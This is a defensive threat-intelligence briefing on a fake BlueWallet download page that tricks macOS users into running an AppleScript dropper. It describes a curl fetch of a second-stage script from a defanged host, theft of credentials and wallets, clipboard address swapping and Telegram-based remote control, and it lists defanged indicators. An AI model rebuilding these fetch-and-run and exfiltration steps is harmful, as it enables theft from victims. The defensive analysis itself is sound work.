Scammers have set up a fake BlueWallet download page that tricks macOS users into infecting their own machines with a data-stealing program. Once it runs, the malware loots saved browser logins, dozens of cryptocurrency wallets, and password managers, then quietly watches the clipboard and swaps any copied wallet address for one the attacker controls, so money you think you are sending to yourself ends up in the thief's pocket instead. Researchers at Malwarebytes Labs who analyzed the campaign stress that BlueWallet, a legitimate open source Bitcoin wallet, was not hacked. The crooks simply copied its name and branding onto a malicious page. The genuine project lives at bluewallet.io, while the imposter serves its payload from update-bluewallet[.]com.
Why this one is dangerous
The clever part is that the malware never breaks Apple's security. It talks the user into switching it off. Instead of shipping a packaged app that would have to clear Apple's notarization and quarantine checks (the gatekeeping that warns you before unsigned software runs), the fake site drops a plain script and walks you through opening it by hand in a trusted Apple tool. No operating system warning ever fires, because the victim is the one pressing play. That makes it a textbook example of a growing trend: as macOS gets harder to attack with rogue binaries, criminals are leaning on social engineering instead. We have seen the same playbook in fake software lures pushing the Atomic macOS Stealer and in spoofed developer tool sites that hijack downloads to drop stealers.
How the attack works
When you land on the fake page, it drops a file named BlueWallet Installer.applescript into your Downloads folder after a two second delay, then rewrites its own on-screen text into setup instructions, complete with a drawn blue play triangle, telling you to open the file in Script Editor and hit play or Command R. Run it, and a short base64-encoded shell command fires off in the background. Decoded, it fetches a second-stage script (curl pulling confighelper_0adfeee8[.]sh from projects2026box[.]com, saved as the hidden file /tmp/.sysupd.sh dressed up to look like a system update), then tells Script Editor to quit without saving so the evidence disappears. The second stage hides its configuration with a weak XOR scrambler (key swckR9JCD2Uu) that defeats casual string searches but is trivially reversible, and it shows that the attacker's Telegram channel handles both data theft and remote control.
What it steals
The harvesting is sweeping. The stealer grabs history, cookies, logins, and bookmarks from Chrome, Firefox, Safari and other browsers; targets more than 20 desktop wallet apps (Electrum, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Sparrow and more) plus dozens of browser-extension wallets such as MetaMask, Phantom, and Keplr; raids password managers including LastPass, 1Password, Bitwarden, Dashlane and Keeper; copies Telegram and Discord session data; sweeps up developer and cloud secrets in .aws, .ssh, .gnupg and .kube; takes the Apple Notes database; and scans the Desktop, Documents, and Downloads folders for files ending in .pem, .env, .seed, .kdbx and .wallet. To capture your Mac login password directly, it pops a dialog titled "System Preferences" asking you to re-enter your password, then verifies each guess against the system before saving it.
Persistence and live control
Stolen data is packaged with Apple's built-in ditto tool and split into 49 MB chunks to slip under Telegram's 50 MB upload cap. The malware installs a LaunchAgent so it restarts every time you log in, and a clipboard watcher continuously matches Bitcoin, Ethereum, and Solana address patterns and overwrites them with attacker addresses the instant you copy, so the swap happens silently before you paste. A polling loop turns the attacker's Telegram bot into a real-time remote control, with commands like /info, /exec, /clipboard, /download, /exfil and /selfdestruct.
What you should do
There is no patch here, because nothing is being exploited. The fix is to avoid the lure and watch for the behavior. Only download BlueWallet from bluewallet.io, and treat any site that asks you to open a downloaded .applescript file in Script Editor as a red flag. Defenders should alert on Script Editor spawning a one-line base64 do-shell-script that immediately quits, flag a hidden /tmp/.sysupd.sh fetched by curl, and consider treating .applescript files arriving from the web with the same suspicion as executables. Anyone who ran the lure should assume the Mac is compromised, rotate every credential from a clean device, and move any cryptocurrency to a brand new wallet.
Indicators of compromise (defanged)
- Delivery and staging: update-bluewallet[.]com, hxxps://projects2026box[.]com/serve_site/confighelper_0adfeee8[.]sh, /tmp/.sysupd.sh
- AppleScript dropper SHA-256: 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61
- Clipboard hijack addresses: BTC bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e, ETH 0x2B871703122064e45d77146a6D5203da3bD192FA, SOL 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v
This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.